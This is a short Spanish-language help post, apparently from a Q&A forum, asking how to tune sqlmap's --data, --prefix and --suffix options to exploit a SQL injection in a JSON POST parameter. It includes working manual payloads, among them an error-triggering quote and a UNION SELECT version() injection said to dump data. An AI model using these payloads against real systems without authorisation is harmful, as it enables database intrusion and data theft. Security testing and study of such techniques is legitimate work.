Quiero realizar una inyección SQL, pero no sé cómo usar el comando. Hasta ahora, he intentado esto:
--data="{'user_id':'6','user_with:5*'}" --prefix=" OR user_to = 5)" --suffix="#" -vvv'
Uso ' en lugar de " en el parámetro porque los datos de publicación de sqlmap deben estar en formato --data="paramter goes here" .
Pero el último show detallado:
{'user_id':'6','\'user_with:5 OR user_to = 5) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#''}
Debería ser:
{'user_id':'6','user_with:5 OR user_to = 5) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#'}
Aquí está mi forma manual:
{"user_id":"6","user_with":"5"} -> return normal
{"user_id":"6","user_with":"5'"} -> return 'You have an error...'
{"user_id":"6","user_with":"5 OR user_to = 5) union select version(),2,3,4,5,6#"} -> return dump data
Entonces, ¿cómo realizar lo que quiero en sqlmap?